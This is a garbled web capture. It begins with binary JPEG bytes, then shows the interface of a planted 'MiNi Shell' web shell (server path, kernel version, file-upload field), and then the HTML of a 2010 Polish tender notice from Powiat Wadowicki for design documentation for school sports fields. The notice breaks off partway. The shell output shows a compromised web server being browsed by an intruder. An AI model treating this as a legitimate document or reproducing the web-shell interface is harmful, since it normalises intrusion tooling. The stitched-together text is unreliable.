JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100215/30631-N-2010.html

<p class="kh_header"><b>Wadowice: Opracowanie dokumentacji projektowej dla robót budowlano - remontowych związanych z modernizacją boisk szkolnych wg 3 zadań: Zadanie nr 1 - ZS Ogólnokształcących im. Marcina Wadowity w Wadowicach; ZS Nr 2 im. Ks. St. Staszica w Wadowicach; ZS Nr 3 im. ks. prof. Józefa Tischnera  w Wadowicach. Zadanie nr 2 - ZS Nr 2 im. św. Jadwigi Królowej w Andrychowie; ZS Nr 1 im. prof. Tadeusza Kotarbińskiego w Andrychowie; Zadanie nr 3 - ZS Rolnicze Centrum Kształcenia Ustawicznego im. Jana Pawła II w Radoczy; ZS im. KEN w Kalwarii Zebrzydowskiej</b><br>
<b>Numer ogłoszenia: 30631 - 2010; data zamieszczenia: 15.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Wadowicki , ul. Batorego 2, 34-100 Wadowice, woj. małopolskie, tel. 033 8734200, faks 033 8232433.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.wadowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla robót budowlano - remontowych związanych z modernizacją boisk szkolnych wg 3 zadań: Zadanie nr 1 - ZS Ogólnokształcących im. Marcina Wadowity w Wadowicach; ZS Nr 2 im. Ks. St. Staszica w Wadowicach; ZS Nr 3 im. ks. prof. Józefa Tischnera  w Wadowicach. Zadanie nr 2 - ZS Nr 2 im. św. Jadwigi Królowej w Andrychowie; ZS Nr 1 im. prof. Tadeusza Kotarbińskiego w Andrychowie; Zadanie nr 3 - ZS Rolnicze Centrum Kształcenia Ustawicznego im. Jana Pawła II w Radoczy; ZS im. KEN w Kalwarii Zebrzydowskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dla robót budowlano - remontowych związanych z modernizacją boisk szkolnych wg 3 zadań: Zadanie nr 1 - Zespołu Szkół Ogólnokształcących im. Marcina Wadowity w Wadowicach, ul. Mickiewicza 16, 34 - 100 Wadowice; Zespołu Szkół Nr 2 im. Ks. St. Staszica w Wadowicach, ul. Zegadłowicza 36, 34 - 100 Wadowice; Zespołu Szkół Nr 3 im. ks. prof. Józefa Tischnera  w Wadowicach, ul. Wojska Polskiego 13, 34 - 100 Wadowice. Zadanie nr 2 - Zespołu Szkół Nr 2 im. św. Jadwigi Królowej w Andrychowie,  ul. Stefana         Batorego 9, 34 - 120 Andrychów; Zespołu Szkół Nr 1 im. prof. Tadeusza Kotarbińskiego w Andrychowie, ul. Starowiejska 22a, 34 - 120 Andrychów. Zadanie nr 3 - Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego im. Jana Pawła II w Radoczy, 34 - 100 Wadowice; Zespołu Szkół im. Komisji Edukacji Narodowej w Kalwarii Zebrzydowskiej, Al. Jana Pawła II 3, 34 - 130 Kalwaria Zebrzydowska.
W ramach niniejszego zamówienia Zamawiający przewiduje wykonanie :
- inwentaryzacji obiektów w zakresie niezbędnym do opracowania dokumentacji
- koncepcji projektowej,
- projektu budowlano - wykonawczego wraz z projektem zagospodarowania terenu,
- specyfikacji technicznej wykonania i odbioru robót,
- przedmiarów robót, kosztorysów inwestorskich dla poszczególnych branż, 
- informacji projektanta o wymaganiach bezpieczeństwa i ochrony zdrowia.
Przed przystąpieniem do projektowania Wykonawca przeprowadzi wizję w terenie i dokona pomiarów uzupełniających niezbędnych między innymi do prawidłowego odwodnienia posesji przyległych do projektowanego terenu. Uzyskanie wszystkich niezbędnych opinii, uzgodnień, pozwoleń, sprawdzeń, zatwierdzeń projektów (w tym decyzji WZiZT jeżeli będzie konieczna), których dołączenia do wniosku o pozwolenie na budowę lub zgłoszenia robót budowlanych, wymagają przepisy art. 30, art. 33 i art. 20 Prawa budowlanego (t.j. Dz. U. z 2006r. nr 156, poz. 1118 z późn. zmianami). Obowiązek wystąpienia do właścicieli sieci o warunki przebudowy lub budowy sieci leży po stronie Wykonawcy. Wykonawca uzyska we własnym zakresie wszelkie niezbędne do opracowania materiały wyjściowe tj. : aktualną mapę sytuacyjno - wysokościową do celów projektowych, badania podłoża gruntowego. W ramach ustalonego w umowie wynagrodzenia, Wykonawca z chwilą przekazania dokumentacji przenosi na rzecz Zamawiającego prawa autorskie majątkowe do dokumentacji - tj. Zamawiający będzie miał prawo do jej użytkowania i sporządzania kopii jedynie przy robotach objętych niniejszą dokumentacją i w celu, do którego jest ona przeznaczona. Zamawiający dopuszcza możliwość zmian zakresu rzeczowego przedmiotu zamówienia w uzasadnionych przypadkach w oparciu  o uzyskane uzgodnienia i opinie. Zamawiający dopuszcza możliwość zmian w zakresie przyjętych materiałów budowlanych jak i sposobu wykonania robót na etapie projektowania.
Dokumentacja projektowo - kosztorysowa powinna być przygotowana w sposób umożliwiający realizację zamierzenia inwestycyjnego bez konieczności zlecania dodatkowych prac projektowych i uzgodnień. Wartość zamówienia jest mniejsza niż kwoty , od których jest uzależniony obowiązek przekazywania ogłoszeń UOPWE.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca winien wykazać, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, wykonał - zrealizował co najmniej jedną usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia tj. wykonanie dokumentacji projektowej przebudowy dróg, boisk lub placów o powierzchni min. 6 000 m2- w formie załączonego do oferty oświadczenia- wykazu z podaniem nazwy i danych zleceniodawcy, zakresu zamówienia, terminów wykonania oraz wartości, potwierdzonego stosownym dokumentem uprzedniego zleceniodawcy o należytym wykonaniu zamówienia. 2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. W tym celu Wykonawca przedstawi pisemne zobowiązanie innych podmiotów,  do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 3. Zamawiający dopuszcza wykonanie przedmiotu zamówienia przy udziale podwykonawców.  
4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie spółki cywilnej lub konsorcjum). W takim przypadku Wykonawcy winni upoważnić jednego spośród siebie jako przedstawiciela pozostałych do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez uprawnionych przedstawicieli wszystkich pozostałych wykonawców. Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie. Jeżeli za najkorzystniejszą uznana zostanie oferta wykonawcy ubiegającego się wspólnie o udzielenie zamówienia Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców. Wykonawca będzie zobowiązany do przedstawienia zamawiającemu oryginału umowy do wglądu oraz do pozostawienia kserokopii potwierdzonej za zgodność z oryginałem właściwej umowy np. konsorcjum, która określi zakres, formę działalności i sposób rozliczania się uczestników.
A. Ocena spełnienia powyższych warunków będzie dokonywana metodą 0 - 1, tj. spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca winien wykazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadające wymagane uprawnienia tj.: kierownik projektu - uprawienia do projektowania w branży drogowej; projektant/projektanci posiadający uprawienia w branżach: drogowej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych, instalacyjnych w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, architektonicznej. Do oferty należy dołączyć oświadczenie - wykaz personelu przewidywanego do realizacji zamówienia. A.	Ocena spełnienia powyższych warunków będzie dokonywana metodą 0 - 1, tj. spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.wadowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wadowicach, ul. Batorego 2  pok. nr 104 (I piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2010 godzina 10:30, miejsce: Starostwo Powiatowe w Wadowicach, ul. Batorego 2 w sekretariacie pok. nr 314 (III piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej dla robót budowlano - remontowych związanych z modernizacją boisk szkolnych wg 3 zadań:
Zadanie nr 1 - Zespołu Szkół Ogólnokształcących im. Marcina Wadowity w Wadowicach, ul. Mickiewicza 16, 34 - 100 Wadowice; Zespołu Szkół Nr 2 im. Ks. St. Staszica w Wadowicach, ul. Zegadłowicza 36, 34 - 100 Wadowice; Zespołu Szkół Nr 3 im. ks. prof. Józefa Tischnera  w Wadowicach, ul. Wojska Polskiego 13, 34 - 100 Wadowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dla robót budowlano - remontowych związanych z modernizacją boisk szkolnych wg 3 zadań: Zadanie nr 1 - Zespołu Szkół Ogólnokształcących im. Marcina Wadowity w Wadowicach, ul. Mickiewicza 16, 34 - 100 Wadowice; Zespołu Szkół Nr 2 im. Ks. St. Staszica w Wadowicach, ul. Zegadłowicza 36, 34 - 100 Wadowice; Zespołu Szkół Nr 3 im. ks. prof. Józefa Tischnera  w Wadowicach, ul. Wojska Polskiego 13, 34 - 100 Wadowice. 
W ramach niniejszego zamówienia Zamawiający przewiduje wykonanie :
- inwentaryzacji obiektów w zakresie niezbędnym do opracowania dokumentacji
- koncepcji projektowej,
- projektu budowlano - wykonawczego wraz z projektem zagospodarowania terenu,
- specyfikacji technicznej wykonania i odbioru robót,
- przedmiarów robót, kosztorysów inwestorskich dla poszczególnych branż, 
- informacji projektanta o wymaganiach bezpieczeństwa i ochrony zdrowia.
Przed przystąpieniem do projektowania Wykonawca przeprowadzi wizję w terenie i dokona pomiarów uzupełniających niezbędnych między innymi do prawidłowego odwodnienia posesji przyległych do projektowanego terenu. Uzyskanie wszystkich niezbędnych opinii, uzgodnień, pozwoleń, sprawdzeń, zatwierdzeń projektów (w tym decyzji WZiZT jeżeli będzie konieczna), których dołączenia do wniosku o pozwolenie na budowę lub zgłoszenia robót budowlanych, wymagają przepisy art. 30, art. 33 i art. 20 Prawa budowlanego (t.j. Dz. U. z 2006r. nr 156, poz. 1118 z późn. zmianami).
Obowiązek wystąpienia do właścicieli sieci o warunki przebudowy lub budowy sieci leży po stronie Wykonawcy. Wykonawca uzyska we własnym zakresie wszelkie niezbędne do opracowania materiały wyjściowe tj. : aktualną mapę sytuacyjno - wysokościową do celów projektowych, badania podłoża gruntowego. W ramach ustalonego w umowie wynagrodzenia, Wykonawca z chwilą przekazania dokumentacji przenosi na rzecz Zamawiającego prawa autorskie majątkowe do dokumentacji - tj. Zamawiający będzie miał prawo do jej użytkowania i sporządzania kopii jedynie przy robotach objętych niniejszą dokumentacją i w celu, do którego jest ona przeznaczona. Zamawiający dopuszcza możliwość zmian zakresu rzeczowego przedmiotu zamówienia w uzasadnionych przypadkach w oparciu  o uzyskane uzgodnienia i opinie. Zamawiający dopuszcza możliwość zmian w zakresie przyjętych materiałów budowlanych jak i sposobu wykonania robót na etapie projektowania.
Dokumentacja projektowo - kosztorysowa powinna być przygotowana w sposób umożliwiający realizację zamierzenia inwestycyjnego bez konieczności zlecania dodatkowych prac projektowych i uzgodnień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej dla robót budowlano - remontowych związanych z modernizacją boisk szkolnych wg 3 zadań: Zadanie nr 2 - Zespołu Szkół Nr 2 im. św. Jadwigi Królowej w Andrychowie,  ul. Stefana Batorego 9, 34 - 120 Andrychów; Zespołu Szkół Nr 1 im. prof. Tadeusza Kotarbińskiego w Andrychowie, ul. Starowiejska 22a, 34 - 120 Andrychów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dla robót budowlano - remontowych związanych z modernizacją boisk szkolnych wg 3 zadań: Zadanie nr 2 - Zespołu Szkół Nr 2 im. św. Jadwigi Królowej w Andrychowie,  ul. Stefana Batorego 9, 34 - 120 Andrychów; Zespołu Szkół Nr 1 im. prof. Tadeusza Kotarbińskiego w Andrychowie, ul. Starowiejska 22a, 34 - 120 Andrychów. W ramach niniejszego zamówienia Zamawiający przewiduje wykonanie :
- inwentaryzacji obiektów w zakresie niezbędnym do opracowania dokumentacji
- koncepcji projektowej,
- projektu budowlano - wykonawczego wraz z projektem zagospodarowania terenu,
- specyfikacji technicznej wykonania i odbioru robót,
- przedmiarów robót, kosztorysów inwestorskich dla poszczególnych branż, 
- informacji projektanta o wymaganiach bezpieczeństwa i ochrony zdrowia.
Przed przystąpieniem do projektowania Wykonawca przeprowadzi wizję w terenie i dokona pomiarów uzupełniających niezbędnych między innymi do prawidłowego odwodnienia posesji przyległych do projektowanego terenu. Uzyskanie wszystkich niezbędnych opinii, uzgodnień, pozwoleń, sprawdzeń, zatwierdzeń projektów (w tym decyzji WZiZT jeżeli będzie konieczna), których dołączenia do wniosku o pozwolenie na budowę lub zgłoszenia robót budowlanych, wymagają przepisy art. 30, art. 33 i art. 20 Prawa budowlanego (t.j. Dz. U. z 2006r. nr 156, poz. 1118 z późn. zmianami).
Obowiązek wystąpienia do właścicieli sieci o warunki przebudowy lub budowy sieci leży po stronie Wykonawcy. Wykonawca uzyska we własnym zakresie wszelkie niezbędne do opracowania materiały wyjściowe tj. : aktualną mapę sytuacyjno - wysokościową do celów projektowych, badania podłoża gruntowego. W ramach ustalonego w umowie wynagrodzenia, Wykonawca z chwilą przekazania dokumentacji przenosi na rzecz Zamawiającego prawa autorskie majątkowe do dokumentacji - tj. Zamawiający będzie miał prawo do jej użytkowania i sporządzania kopii jedynie przy robotach objętych niniejszą dokumentacją i w celu, do którego jest ona przeznaczona. Zamawiający dopuszcza możliwość zmian zakresu rzeczowego przedmiotu zamówienia w uzasadnionych przypadkach w oparciu  o uzyskane uzgodnienia i opinie. Zamawiający dopuszcza możliwość zmian w zakresie przyjętych materiałów budowlanych jak i sposobu wykonania robót na etapie projektowania. Dokumentacja projektowo - kosztorysowa powinna być przygotowana w sposób umożliwiający realizację zamierzenia inwestycyjnego bez konieczności zlecania dodatkowych prac projektowych i uzgodnień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej dla robót budowlano - remontowych związanych z modernizacją boisk szkolnych wg 3 zadań: Zadanie nr 3 - Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego im. Jana Pawła II w Radoczy, 34 - 100 Wadowice; Zespołu Szkół im. Komisji Edukacji Narodowej w Kalwarii Zebrzydowskiej, Al. Jana Pawła II 3, 34 - 130 Kalwaria Zebrzydowska..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dla robót budowlano - remontowych związanych z modernizacją boisk szkolnych wg 3 zadań: Zadanie nr 3 - Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego im. Jana Pawła II w Radoczy, 34 - 100 Wadowice; Zespołu Szkół im. Komisji Edukacji Narodowej w Kalwarii Zebrzydowskiej, Al. Jana Pawła II 3, 34 - 130 Kalwaria Zebrzydowska. W ramach niniejszego zamówienia Zamawiający przewiduje wykonanie :
- inwentaryzacji obiektów w zakresie niezbędnym do opracowania dokumentacji
- koncepcji projektowej,
- projektu budowlano - wykonawczego wraz z projektem zagospodarowania terenu,
- specyfikacji technicznej wykonania i odbioru robót,
- przedmiarów robót, kosztorysów inwestorskich dla poszczególnych branż, 
- informacji projektanta o wymaganiach bezpieczeństwa i ochrony zdrowia.
